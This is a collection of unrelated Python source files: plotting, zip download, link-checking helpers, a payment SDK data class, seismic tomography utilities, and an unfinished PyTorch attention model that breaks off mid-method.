title = 'Average Completion Time per CPUs'
ylabel = 'Completion Time [us]'
if metric.upper() == 'TIME':
title = 'Total Execution Time per CPUs'
ylabel = 'Execution Time [us]'
data = df[metric.lower()].unstack()
axes = data.plot(kind='bar',
figsize=(16, 8), legend=True,
title=title, table=True)
axes.set_ylabel(ylabel)
axes.get_xaxis().set_visible(False)
# vim :set tabstop=4 shiftwidth=4 expandtab
|
import zipfile
import io
import requests
def _get_zip(url):
"""Retrieve zipfile using http request.
zipfiles
Parameters
----------
url : type
Description of parameter `url`.
Returns
-------
zipfile.ZipFile
Usage:
>>> zip = _get_zip('https://www.bls.gov/oes/special.requests/oesm17nat.zip')
>>> type(zip)
<class 'zipfile.ZipFile'>
>>> for file in zip.filelist:
... print(file.filename)
...
oesm17nat/field_descriptions.xlsx
oesm17nat/national_M2017_dl.xlsx
# accessing zipfile obects for i/o operations
>>> fp = zip.open('oesm17nat/field_descriptions.xlsx', 'r')
>>> fp.readable()
True
fp.close()
"""
try:
r = requests.get(url)
if r.ok:
return zipfile.ZipFile(io.BytesIO(r.content))
else:
raise requests.exceptions.HTTPError('Not a valid request.'
'Double check for valid parameters.')
except requests.exceptions.ConnectionError as e:
print(e, '\nFailed to establish a new connection. Check internet.')
def get_file(url, filename):
try:
zip = _get_zip(url)
fp = zip.open(filename, 'r')
return fp
except Exception as e:
print(e)
|
# import asyncio
import logging
import pathlib
# import re
# import httpx
logger = logging.getLogger(__name__)
class Tag:
@staticmethod
def tag(tag, content, **attrs):
attr_line = ''.join(f' {attr}="{v}"' for attr, v in attrs.items())
return f'<{tag}{attr_line}>{content}</{tag}>'
@staticmethod
def font(content, color):
return Tag.tag('font', content, color=color)
@staticmethod
def grey(content):
return Tag.font(content, 'lightgrey')
def should_update(src_path: pathlib.Path, dst_path: pathlib.Path):
if dst_path.exists() and src_path.stat().st_mtime <= dst_path.stat().st_mtime:
return False
return True
################################################################################
# TODO: WIP, doesn't work now
# https://www.twilio.com/blog/asynchronous-http-requests-in-python-with-httpx-and-asyncio
# def gather_urls(path) -> list[str]:
# urls = []
# with open(path, encoding='utf8') as reader:
# for line in reader:
# for match in re.finditer(r'\[.*?\]\((.*?)\)', line):
# # TODO: make it safe since there can be `()` in the url
# url_desc = match.group(1)
# if not url_desc.startswith('http'):
# logger.warning(
# f"{url_desc} doesn't start with http: {line} {path.name}")
# continue
# urls.append(re.sub(r' ".*?"', '', url_desc))
# return urls
#
#
# # TODO: still full of errors
# # white_list = [
# # 'wikipedia.org',
# # 'https://github.com',
# # 'https://www.youtube.com',
# # 'https://shiina18.github.io'
# # ]
#
#
# async def is_url_alive(client, url, posts):
# log = f' : {url} {posts}'
# # TODO: VPN can not be used now
# # for s in white_list:
# # if s in url:
# # return
# try:
# headers = {
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'
# }
# await client.head(url, headers=headers)
# # TODO: check status code
# logger.debug('ok' + log)
# except httpx.ConnectTimeout as exc:
# logger.error(type(exc).__name__ + log)
# except (httpx.RemoteProtocolError, httpx.ReadTimeout) as exc:
# logger.debug(type(exc).__name__ + log)
# except httpx.HTTPError as exc:
# logger.error(type(exc).__name__ + log)
#
#
# async def check_urls(url_posts_dict: dict[str, list[str]]):
# # https://www.python-httpx.org/advanced/#pool-limit-configuration
# limits = httpx.Limits(max_connections=None)
# async with httpx.AsyncClient(limits=limits) as client:
# tasks = [
# asyncio.ensure_future(is_url_alive(client, url, posts))
# for url, posts in url_posts_dict.items()
# ]
# await asyncio.gather(*tasks)
################################################################################
|
# -*- coding: utf-8 -*-
#
# This class was auto-generated from the API references found at
# https://epayments-api.developer-ingenico.com/s2sapi/v1/
#
from ingenico.connect.sdk.data_object import DataObject
from ingenico.connect.sdk.domain.definitions.lodging_charge import LodgingCharge
from ingenico.connect.sdk.domain.definitions.lodging_room import LodgingRoom
class LodgingData(DataObject):
"""
| Object that holds lodging specific data
"""
__charges = None
__check_in_date = None
__check_out_date = None
__folio_number = None
__is_confirmed_reservation = None
__is_facility_fire_safety_conform = None
__is_no_show = None
__is_preference_smoking_room = None
__number_of_adults = None
__number_of_nights = None
__number_of_rooms = None
__program_code = None
__property_customer_service_phone_number = None
__property_phone_number = None
__renter_name = None
__rooms = None
@property
def charges(self):
"""
| Object that holds lodging related charges
Type: list[:class:`ingenico.connect.sdk.domain.definitions.lodging_charge.LodgingCharge`]
"""
return self.__charges
@charges.setter
def charges(self, value):
self.__charges = value
@property
def check_in_date(self):
"""
| The date the guest checks into (or plans to check in to) the facility.
| Format: YYYYMMDD
Type: str
"""
return self.__check_in_date
@check_in_date.setter
def check_in_date(self, value):
self.__check_in_date = value
@property
def check_out_date(self):
"""
| The date the guest checks out of (or plans to check out of) the facility.
| Format: YYYYMMDD
Type: str
"""
return self.__check_out_date
@check_out_date.setter
def check_out_date(self, value):
self.__check_out_date = value
@property
def folio_number(self):
"""
| The Lodging Folio Number assigned to the itemized statement of charges and credits associated with this lodging stay, which can be any combination of characters and numerals defined by the Merchant or authorized Third Party Processor.
Type: str
"""
return self.__folio_number
@folio_number.setter
def folio_number(self, value):
self.__folio_number = value
@property
def is_confirmed_reservation(self):
"""
| Indicates whether the room reservation is confirmed.
* true - The room reservation is confirmed
* false - The room reservation is not confirmed
Type: bool
"""
return self.__is_confirmed_reservation
@is_confirmed_reservation.setter
def is_confirmed_reservation(self, value):
self.__is_confirmed_reservation = value
@property
def is_facility_fire_safety_conform(self):
"""
| Defines whether or not the facility conforms to the requirements of the Hotel and Motel Fire Safety Act of 1990, or similar legislation.
* true - The facility conform to the requirements
* false - The facility doesn't conform to the requirements
Type: bool
"""
return self.__is_facility_fire_safety_conform
@is_facility_fire_safety_conform.setter
def is_facility_fire_safety_conform(self, value):
self.__is_facility_fire_safety_conform = value
@property
def is_no_show(self):
"""
| Indicate if this the customer is a no show case. In such case, the lodging property can charge a no show fee.
* true - The customer is a no show
* false - Not applicable
Type: bool
"""
return self.__is_no_show
@is_no_show.setter
def is_no_show(self, value):
self.__is_no_show = value
@property
def is_preference_smoking_room(self):
"""
| Indicated the preference of the customer for a smoking or non-smoking room.
* true - A smoking room is preferred
* false - A non-smoking room is preferred
Type: bool
"""
return self.__is_preference_smoking_room
@is_preference_smoking_room.setter
def is_preference_smoking_room(self, value):
self.__is_preference_smoking_room = value
@property
def number_of_adults(self):
"""
| The total number of adult guests staying (or planning to stay) at the facility (i.e., all booked rooms)
Type: int
"""
return self.__number_of_adults
@number_of_adults.setter
def number_of_adults(self, value):
self.__number_of_adults = value
@property
def number_of_nights(self):
"""
| The number of nights for the lodging stay
Type: int
"""
return self.__number_of_nights
@number_of_nights.setter
def number_of_nights(self, value):
self.__number_of_nights = value
@property
def number_of_rooms(self):
"""
| The number of rooms rented for the lodging stay
Type: int
"""
return self.__number_of_rooms
@number_of_rooms.setter
def number_of_rooms(self, value):
self.__number_of_rooms = value
@property
def program_code(self):
"""
| Code that corresponds to the category of lodging charges detailed in this message.Allowed values:
* lodging - (Default) Submitted charges are for lodging
* noShow - Submitted charges are for the failure of the guest(s) to check in for reserved a room
* advancedDeposit - Submitted charges are for an Advanced Deposit to reserve one or more rooms
| If no value is submitted the default value lodging is used.
Type: str
"""
return self.__program_code
@program_code.setter
def program_code(self, value):
self.__program_code = value
@property
def property_customer_service_phone_number(self):
"""
| The international customer service phone number of the facility
Type: str
"""
return self.__property_customer_service_phone_number
@property_customer_service_phone_number.setter
def property_customer_service_phone_number(self, value):
self.__property_customer_service_phone_number = value
@property
def property_phone_number(self):
"""
| The local phone number of the facility in an international phone number format
Type: str
"""
return self.__property_phone_number
@property_phone_number.setter
def property_phone_number(self, value):
self.__property_phone_number = value
@property
def renter_name(self):
"""
| Name of the person or business entity charged for the reservation and/or lodging stay
Type: str
"""
return self.__renter_name
@renter_name.setter
def renter_name(self, value):
self.__renter_name = value
@property
def rooms(self):
"""
| Object that holds lodging related room data
Type: list[:class:`ingenico.connect.sdk.domain.definitions.lodging_room.LodgingRoom`]
"""
return self.__rooms
@rooms.setter
def rooms(self, value):
self.__rooms = value
def to_dictionary(self):
dictionary = super(LodgingData, self).to_dictionary()
if self.charges is not None:
dictionary['charges'] = []
for element in self.charges:
if element is not None:
dictionary['charges'].append(element.to_dictionary())
if self.check_in_date is not None:
dictionary['checkInDate'] = self.check_in_date
if self.check_out_date is not None:
dictionary['checkOutDate'] = self.check_out_date
if self.folio_number is not None:
dictionary['folioNumber'] = self.folio_number
if self.is_confirmed_reservation is not None:
dictionary['isConfirmedReservation'] = self.is_confirmed_reservation
if self.is_facility_fire_safety_conform is not None:
dictionary['isFacilityFireSafetyConform'] = self.is_facility_fire_safety_conform
if self.is_no_show is not None:
dictionary['isNoShow'] = self.is_no_show
if self.is_preference_smoking_room is not None:
dictionary['isPreferenceSmokingRoom'] = self.is_preference_smoking_room
if self.number_of_adults is not None:
dictionary['numberOfAdults'] = self.number_of_adults
if self.number_of_nights is not None:
dictionary['numberOfNights'] = self.number_of_nights
if self.number_of_rooms is not None:
dictionary['numberOfRooms'] = self.number_of_rooms
if self.program_code is not None:
dictionary['programCode'] = self.program_code
if self.property_customer_service_phone_number is not None:
dictionary['propertyCustomerServicePhoneNumber'] = self.property_customer_service_phone_number
if self.property_phone_number is not None:
dictionary['propertyPhoneNumber'] = self.property_phone_number
if self.renter_name is not None:
dictionary['renterName'] = self.renter_name
if self.rooms is not None:
dictionary['rooms'] = []
for element in self.rooms:
if element is not None:
dictionary['rooms'].append(element.to_dictionary())
return dictionary
def from_dictionary(self, dictionary):
super(LodgingData, self).from_dictionary(dictionary)
if 'charges' in dictionary:
if not isinstance(dictionary['charges'], list):
raise TypeError('value \'{}\' is not a list'.format(dictionary['charges']))
self.charges = []
for element in dictionary['charges']:
value = LodgingCharge()
self.charges.append(value.from_dictionary(element))
if 'checkInDate' in dictionary:
self.check_in_date = dictionary['checkInDate']
if 'checkOutDate' in dictionary:
self.check_out_date = dictionary['checkOutDate']
if 'folioNumber' in dictionary:
self.folio_number = dictionary['folioNumber']
if 'isConfirmedReservation' in dictionary:
self.is_confirmed_reservation = dictionary['isConfirmedReservation']
if 'isFacilityFireSafetyConform' in dictionary:
self.is_facility_fire_safety_conform = dictionary['isFacilityFireSafetyConform']
if 'isNoShow' in dictionary:
self.is_no_show = dictionary['isNoShow']
if 'isPreferenceSmokingRoom' in dictionary:
self.is_preference_smoking_room = dictionary['isPreferenceSmokingRoom']
if 'numberOfAdults' in dictionary:
self.number_of_adults = dictionary['numberOfAdults']
if 'numberOfNights' in dictionary:
self.number_of_nights = dictionary['numberOfNights']
if 'numberOfRooms' in dictionary:
self.number_of_rooms = dictionary['numberOfRooms']
if 'programCode' in dictionary:
self.program_code = dictionary['programCode']
if 'propertyCustomerServicePhoneNumber' in dictionary:
self.property_customer_service_phone_number = dictionary['propertyCustomerServicePhoneNumber']
if 'propertyPhoneNumber' in dictionary:
self.property_phone_number = dictionary['propertyPhoneNumber']
if 'renterName' in dictionary:
self.renter_name = dictionary['renterName']
if 'rooms' in dictionary:
if not isinstance(dictionary['rooms'], list):
raise TypeError('value \'{}\' is not a list'.format(dictionary['rooms']))
self.rooms = []
for element in dictionary['rooms']:
value = LodgingRoom()
self.rooms.append(value.from_dictionary(element))
return self
|
import os
os.environ['TF_KERAS'] = '1'
import numpy as np
from skimage.filters import gaussian
if os.environ.get('TF_KERAS'):
from classification_models.tfkeras import Classifiers
class DummyModel:
def __init__(self):
pass
def predict(self, image: np.ndarray, sigma: float = 3.0) -> np.ndarray:
return gaussian(image, sigma=sigma, preserve_range=True)
class ImageNetModel:
def __init__(self):
self.pretrainedModel, self.preprocess_input = Classifiers.get('resnet18')
def predict(self, image: np.ndarray) -> np.ndarray:
model = self.pretrainedModel(
input_shape=(224, 224, 3), weights="imagenet", classes=1000
)
image = self.preprocess_input(image)
image = np.expand_dims(image, 0)
y = model.predict(image)
return y
if __name__ == "__main__":
pass
|
# -*- coding: utf-8 -*-
"""
Utilities for ROSES 2021
Adapted from (https://github.com/bgoutorbe/seismic-noise-tomography)
"""
import numpy as np
import itertools as it
import scipy
import pygmt
import xarray as xr
from . import psutils
from .pstomo import Grid
def make_G(paths, grid, v0):
"""
Makes the matrix G for a given set of paths:
"""
G = np.zeros((len(paths), grid.n_nodes()))
for ipath, path in enumerate(paths):
lon_M, lat_M = path[:, 0], path[:, 1]
xyzM = psutils.geo2cartesian(lon_M, lat_M)
iA, iB, iC = grid.indexes_delaunay_triangle(lon_M, lat_M)
lonlatA, lonlatB, lonlatC = [grid.xy(index_) for index_ in (iA, iB, iC)]
xyzA, xyzB, xyzC = [psutils.geo2cartesian(lon, lat)
for lon, lat in (lonlatA, lonlatB, lonlatC)]
xyzMp = psutils.projection(xyzM, xyzA, xyzB, xyzC)
wA, wB, wC = psutils.barycentric_coords(xyzMp, xyzA, xyzB, xyzC)
# attributing weights to grid nodes along path:
# w[j, :] = w_j(r) = weights of node j along path
nM = path.shape[0]
w = np.zeros((grid.n_nodes(), nM))
w[iA, range(nM)] = wA
w[iB, range(nM)] = wB
w[iC, range(nM)] = wC
# ds = array of infinitesimal distances along path
ds = psutils.dist(lons1=lon_M[:-1], lats1=lat_M[:-1],
lons2=lon_M[1:], lats2=lat_M[1:])
# integrating w_j(r) / v0 along path using trapeze formula
G[ipath, :] = np.sum(0.5 * (w[:, :-1] + w[:, 1:]) / v0 * ds, axis=-1)
G = np.matrix(G)
return G
def checkerboard_func(grid, vmid, vmin, vmax, squaresize, shape='cos'):
"""
Returns a checkerboard function, f(lons, lats), whose background
value is *vmid*, and alternating min/max values are *vmin* and
*vmax*. The centers of the anomalies are separated by *squaresize*
(in km), and their shape is either 'gaussian' or 'cos'.
@rtype: function
"""
# converting square size from km to degrees
d2rad = np.pi / 180.0
midlat = 0.5 * (grid.ymin + grid.get_ymax())
latwidth = squaresize / 6371.0 / d2rad
lonwidth = squaresize / (6371.0 * np.cos(midlat * d2rad)) / d2rad
# Basis function defining an anomaly of
# unit height centered at (*lon0*, *lat0*).
if shape.lower().strip() == 'gaussian':
def basis_func(lons, lats, lon0, lat0):
"""
Gausian anomaly , with sigma-parameter such that 3 sigma
is the distance between the center and the border of
the square, that is, half the distance between 2
centers.
"""
n = len(lons)
r = psutils.dist(lons1=lons, lats1=lats, lons2=n*[lon0], lats2=n*[lat0])
sigma = squaresize / 6.0
return np.exp(- r**2 / (2 * sigma**2))
elif shape.lower().strip() == 'cos':
def basis_func(lons, lats, lon0, lat0):
"""
Cosinus anomaly
"""
x = (lons - lon0) / lonwidth
y = (lats - lat0) / latwidth
outside_square = (np.abs(x) >= 0.5) | (np.abs(y) >= 0.5)
return np.where(outside_square, 0.0, np.cos(np.pi*x) * np.cos(np.pi*y))
else:
raise Exception("Unknown shape anomaly: " + shape)
# coordinates of the center of the anomalies
startlon = grid.xmin + lonwidth / 2.0
stoplon = grid.get_xmax() + lonwidth
centerlons = list(np.arange(startlon, stoplon, lonwidth))
startlat = grid.ymin + latwidth / 2.0
stoplat = grid.get_ymax() + latwidth
centerlats = list(np.arange(startlat, stoplat, latwidth))
centerlonlats = list(it.product(centerlons, centerlats))
# factors by which multiply the basis function associated
# with each center (to alternate lows and highs)
polarities = [(centerlons.index(lon) + centerlats.index(lat)) % 2
for lon, lat in centerlonlats]
factors = np.where(np.array(polarities) == 1, vmax - vmid, vmin - vmid)
def func(lons, lats):
"""
Checkboard function: sum of the basis functions along
the centers defined above, times the high/low factor,
plus background velocity.
"""
lowhighs = [f * basis_func(lons, lats, lon0, lat0) for f, (lon0, lat0)
in zip(factors, centerlonlats)]
return vmid + sum(lowhighs)
return func
def path_density(grid, paths, window):
"""
Returns the path density, that is, on each node of the
grid, the number of paths that cross the rectangular
cell of size (window[0], window[1]) centered on
the node.
"""
# initializing path density
density = np.zeros(grid.n_nodes())
# coordinates of grid nodes and associated windows
lons_nodes, lats_nodes = grid.xy_nodes()
lons_min = np.expand_dims(lons_nodes - window[0] / 2.0, axis=-1)
lons_max = np.expand_dims(lons_nodes + window[0] / 2.0, axis=-1)
lats_min = np.expand_dims(lats_nodes - window[1] / 2.0, axis=-1)
lats_max = np.expand_dims(lats_nodes + window[1] / 2.0, axis=-1)
for path in paths:
lons_path, lats_path = path[:, 0], path[:, 1]
# are points of paths in windows?
# 1st dim = grid nodes; 2nd dim = points along path
points_in_windows = (lons_path >= lons_min) & (lons_path <= lons_max) & \
(lats_path >= lats_min) & (lats_path <= lats_max)
density += np.any(points_in_windows, axis=-1)
return density
def invert4model(alpha, beta, lambda_, correlation_length, lonstep, latstep,
grid, vels, dists, paths):
"""
A function to wrap all the calculations when inverting for the tomographic
model.
Parameters:
-----------
alpha: float
The smoothing parameter for the inversion.
beta: float
The strength of the weighted norm penalization term in the penalty
function
lambda_: float
Returns:
--------
????
"""
s = (dists / vels).sum() / dists.sum()
v0 = 1.0 / s
G = make_G(paths, grid, v0)
dobs = np.matrix(dists / vels - dists / v0).T
density = path_density(grid, paths, window=(lonstep, latstep))
sigmav = np.ones((len(vels))) * 0.3
sigmad = sigmav * dists / vels**2
Cinv = np.matrix(np.zeros((len(sigmav), len(sigmav))))
np.fill_diagonal(Cinv, 1.0 / sigmad**2)
twoD_path_density = grid.to_2D_array(density)
dists_mat = np.zeros((grid.n_nodes(), grid.n_nodes()))
i_upper, j_upper = np.triu_indices_from(dists_mat)
lons_i, lats_i = grid.xy(i_upper)
lons_j, lats_j = grid.xy(j_upper)
dists_mat[i_upper, j_upper] = psutils.dist(lons1=lons_i, lats1=lats_i,
lons2=lons_j, lats2=lats_j)
dists_mat += dists_mat.T
# Calculate the smoothing kernel
S = np.exp(- dists_mat**2 / (2 * correlation_length**2))
S /= S.sum(axis=-1) - np.diag(S) # normalization of non-diagonal terms
# setting up spatial regularization matrix F
F = np.matrix(-S)
F[np.diag_indices_from(F)] = 1
F *= alpha
# Calculate regularization matrix Q
# ----------------------------------------------------------------------- #
Q = F.T * F
for i, pd in enumerate(density):
Q[i, i] += beta ** 2 * np.exp(-2 * lambda_ * pd)
# ----------------------------------------------------------------------- #
covmopt = np.linalg.inv(G.T * Cinv * G + Q)
Ginv = covmopt * G.T # Calculate the generalized inverse
mopt = Ginv * Cinv * dobs
R = Ginv * Cinv * G
v = grid.to_2D_array(v0 / (1 + mopt))
return v, twoD_path_density, R, grid, Cinv, Ginv
def make_paths(disp_curves, v_type):
# Here I am just appending to a list. This is not necessarily fast, but
# I'm only appending a few values so it's ok here. Usually it's better to
# predefine the array.
paths = []
dists = []
for idx, row in disp_curves.iterrows():
dist = psutils.dist(row.source_lon, row.source_lat,
row.receiver_lon, row.receiver_lat)
npts = np.max([np.ceil(dist) + 1, 100])
source_coords = (row.source_lon, row.source_lat)
receiver_coords = (row.receiver_lon, row.receiver_lat)
path = psutils.geodesic(source_coords, receiver_coords, npts)
paths.append(path)
dists.append(dist)
dists = np.array(dists)
paths = np.array(paths, dtype="object")
vels = disp_curves[v_type]
return vels, paths, dists
def make_grid(disp_curves, tol, latstep, lonstep):
"""
Set up the inversion grid.
"""
# Get the smallest longitude
min_rcv_lon = np.min(disp_curves["receiver_lon"])
min_src_lon = np.min(disp_curves["source_lon"])
min_lon = np.min([min_rcv_lon, min_src_lon]) - tol
# Get the smallest latitude
min_rcv_lat = np.min(disp_curves["receiver_lat"])
min_src_lat = np.min(disp_curves["source_lat"])
min_lat = np.min([min_rcv_lat, min_src_lat]) - tol
# Get the largest longitude
max_rcv_lon = np.max(disp_curves["receiver_lon"])
max_src_lon = np.max(disp_curves["source_lon"])
max_lon = np.max([max_rcv_lon, max_src_lon])
# Get the largest latitude
max_rcv_lat = np.max(disp_curves["receiver_lat"])
max_src_lat = np.max(disp_curves["source_lat"])
max_lat = np.max([max_rcv_lat, max_src_lat])
nlon = np.ceil((max_lon + tol - min_lon) / lonstep)
nlat = np.ceil((max_lat + tol - min_lat) / latstep)
# Create a grid object, from pysismo
grid = Grid(min_lon, lonstep, nlon, min_lat, latstep, nlat)
return grid
def plot_interpolated(grid, v, fine_num_lats, fine_num_lons, path_density, inset_region,
v_type):
xmin, xmax, ymin, ymax = grid.bbox()
# Interpolate the data onto a finer grid
# --------------------------------------------------------------------------------------------------------------- #
lats = np.linspace(ymin, ymax, fine_num_lats)
lons = np.linspace(xmin, xmax, fine_num_lons)
x = np.digitize(lats, grid.yarray(), right=True)
y = np.digitize(lons, grid.xarray(), right=True)
fv = scipy.interpolate.interp2d(grid.yarray(), grid.xarray(), v, kind="cubic")
v_interp = fv(lats, lons)
# ----------------------------------------------------------------------- #
# Mask areas with no raypaths
# ----------------------------------------------------------------------- #
for i in range(len(x)):
for j in range(len(y)):
dens = path_density[y[j], x[i]]
if dens < 1.0:
v_interp[j, i] = v_interp[j, i] * np.nan
# ----------------------------------------------------------------------- #
grd = xr.DataArray(v_interp.T, coords=(lats, lons)) # Get the data in a format that pygmt can use
fig = pygmt.Figure()
fig.basemap(
region=f"{xmin-1}/{xmax+1}/{ymin-1}/{ymax+1}", # Plot a slightly expanded region around the study area
frame=True, # Plot a nice frame
projection="M15c" # Use Mercator projection with a plot width of 15cm
)
fig.coast(
land="lightgray", # Color the land light gray
water="white", # color the water white
borders=1, # Plot national boundaries
shorelines=True # Show shorelines
)
# Make a colormap
pygmt.makecpt(
cmap="inferno", reverse=True,
series=[np.nanmin(v_interp), np.nanmax(v_interp)]
)
# Show the tomography data
fig.grdimage(
grd,
frame=True,
cmap=True,
nan_transparent=True,
transparency=20
)
# Make an inset plot, with the study area depicted
with fig.inset(position="jTL+w5c/4.8c", box="+gblack+p2p"):
fig.coast(
region=inset_region,
land="green",
water="cornflowerblue"
)
rectangle=[[xmin-1, ymin-1, xmax+1,ymax+1]]
fig.plot(data=rectangle, style="r+s", pen="2p,blue")
fig.colorbar(frame=f'+l"{v_type} [km/s]"')
fig.show()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Attention(nn.Module):
def __init__(self):
super(Attention, self).__init__()
self.L = 500
self.D = 128
self.embeddingDimension = 120
self.K = 1
self.attention = nn.Sequential(
nn.Linear(self.L, self.D),
nn.Tanh(),
nn.Linear(self.D, self.K)
)
self.classifier = nn.Sequential(
nn.Linear(self.L*self.K, 1),
nn.Sigmoid()
)
#this is a trial attempt at building a feature extractor for the optical flow from i3d
# input dimension will be (7,7,1024) or (m,7,7,1024) maybe?
#output will be a 120 dimension vector for now
def feature_extractor_opticalflow_i3d(self, opticalFlow, ifPool=False):
#reshaping the opticalFlow, so that it is in channel-first order (m,1024,7,7)
opticalFlow = opticalFlow.permute(0,3,1,2)
if ifPool==True:
opticalFlow = nn.MaxPool2d(kernel_size=3, stride=1)(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
else:
opticalFlow = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1)(opticalFlow)
opticalFlow = nn.ReLU()(opticalFlow)
opticalFlow = opticalFlow.reshape(-1, 64*3*3)
opticalFlow = nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension)
opticalFlow = nn.ReLU()(opticalFlow)
return opticalFlow
#this is a trial attempt at building a feature extractor for the rgb output from i3d
# input dimension will be (7,7,1024) or (m,7,7,1024) maybe?
#output will be a 120 dimension vector for now
def feature_extractor_rgb_i3d(self, rgb, ifPool=False):
#reshaping the rgb input, so that it is in channel-first order (m,1024,7,7)
rgb = rgb.permute(0,3,1,2)
if ifPool==True:
rgb = nn.MaxPool2d(kernel_size=3, stride=1)(rgb)
rgb = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1)(rgb)
rgb = nn.ReLU()(rgb)
else:
rgb = nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1)(rgb)
rgb = nn.ReLU()(rgb)
rgb = rgb.reshape(-1, 64*3*3)
rgb = nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension)
rgb = nn.ReLU()(rgb)
return rgb
def forward(self, x):
x = x.squeeze(0)
H = self.feature_extractor_part1(x)
H = H.view(-1, 50 * 4 * 4)
H = self.feature_extractor_part2(H) # NxL
A = self.attention(H) # NxK
A = torch.transpose(A, 1, 0) # KxN
A = F.softmax(A, dim=1) # softmax over N
M = torch.mm(A, H) # KxL
Y_prob = self.classifier(M)
Y_hat = torch.ge(Y_prob, 0.5).float()
return Y_prob, Y_hat, A
# AUXILIARY METHODS
def calculate_classification_error(self, X, Y):
Y = Y.float()
_, Y_hat, _ = self.forward(X)
error = 1. - Y_hat.eq(Y).cpu().float().mean().data[0]
return error, Y_hat
def calculate_objective(self, X, Y):
Y = Y.float()
Y_prob, _, A = self.forward(X)
Y_prob = torch.clamp(Y_prob, min=1e-5, max=1. - 1e-5)
neg_log_likelihood = -1. * (Y * torch.log(Y_prob) + (1. - Y) * torch.log(1. - Y_prob)) # negative log bernoulli
return neg_log_likelihood, A
class GatedAttention(nn.Module):
def __init__(self, embeddingDimension=120):
super(GatedAttention, self).__init__()
# self.L = 500
self.L = 256
self.D = 64
self.embeddingDimension = embeddingDimension #this could be a possible hyperparameter
self.K = 1
self.poolingPolicy = ["attention", "avg", "max"]
""" i3d layers """
self.i3d_opticalflow_extractor1 = nn.Sequential(
#when pooling layer is used
nn.MaxPool2d(kernel_size=3, stride=1),
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1),
nn.ReLU()
)
self.i3d_opticalflow_extractor2 = nn.Sequential(
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1),
nn.ReLU()
)
self.i3d_opticalflow_extractor3 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1),
nn.ReLU()
)
self.i3d_opticalflow_extractor4 = nn.Sequential(
nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension),
nn.ReLU()
)
self.i3d_rgb_extractor1 = nn.Sequential(
#When pooling layer is used
nn.MaxPool2d(kernel_size=3, stride=1),
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3,stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=1, stride=1),
nn.ReLU()
)
self.i3d_rgb_extractor2 = nn.Sequential(
nn.Conv2d(in_channels=1024, out_channels=512, kernel_size=3, stride=1),
nn.ReLU(),
nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, stride=1),
nn.ReLU()
)
self.i3d_rgb_extractor3 = nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=64, kernel_size=1),
nn.ReLU()
)
self.i3d_rgb_extractor4 = nn.Sequential(
nn.Linear(in_features=64*3*3, out_features=self.embeddingDimension),
nn.ReLU()
)
""" openpose frame layers """
self.frame_dense1 = nn.Linear(in_features=25*3, out_features=self.embeddingDimension)
self.attention_V_frame = nn.Sequential(
nn.Linear(self.embeddingDimension, self.D),
# nn.Linear(90, 60),
nn.Tanh()
)
self.attention_U_frame = nn.Sequential(
nn.Linear(self.embeddingDimension, self.D),
# nn.Linear(90, 60),
nn.Sigmoid()
)
self.attention_weights_frame = nn.Linear(self.D, self.K)
""" openpose instance layers"""
self.instance_dense1 = nn.Linear(in_features=120, out_features=256)
self.lstm_input_dim = 256
self.lstm_output_dim = 512
self.lstm_layers_num = 1
#should we opt for bidirectional lstm layer?
self.instance_lstm_layer = nn.LSTM(
input_size=self.lstm_input_dim,
hidden_size=self.lstm_output_dim,
num_layers=self.lstm_layers_num,
batch_first=True,
# bidirectional=True
)
self.instance_dense2 = nn.Linear(in_features=512, out_features=120)
self.attention_V_instance = nn.Sequential(
nn.Linear(512, 256),
# nn.Linear(90, 60),
nn.Tanh()
)
self.attention_U_instance = nn.Sequential(
nn.Linear(512, 256),
# nn.Linear(90, 60),
nn.Sigmoid()
)
self.attention_weights_instance = nn.Linear(256, self.K)
"openpose bag layers"
"""classfier layers"""
self.classifier = nn.Sequential(
nn.Linear(self.L*self.K, 1),
nn.Sigmoid()
)
#this is a trial attempt at building a feature extractor for the optical flow from i3d
# (m,7,7,1024) maybe?
#I'm assuming, the input will be of the form (m, 7, 7, 1024)
#output will be a 120 dimension vector for now
def feature_extractor_opticalflow_i3d(self, opticalFlow, ifPool=False):
#reshaping the opticalFlow, so that it is in channel-first order (m,1024,7,7)
# opticalFlow = opticalFlow.permute(0,3,1,2)
#reshaping the opticalFlow, so that it is in channel-first order (1024,7,7)
opticalFlow = opticalFlow.permute(2,0,1) """change here"""
opticalFlow = opticalFlow.unsqueeze(0) #including the batch size, the shape becomes (1,1024,7,7)
if ifPool==True:
opticalFlow = self.i3d_opticalflow_extractor1(opticalFlow)
else:
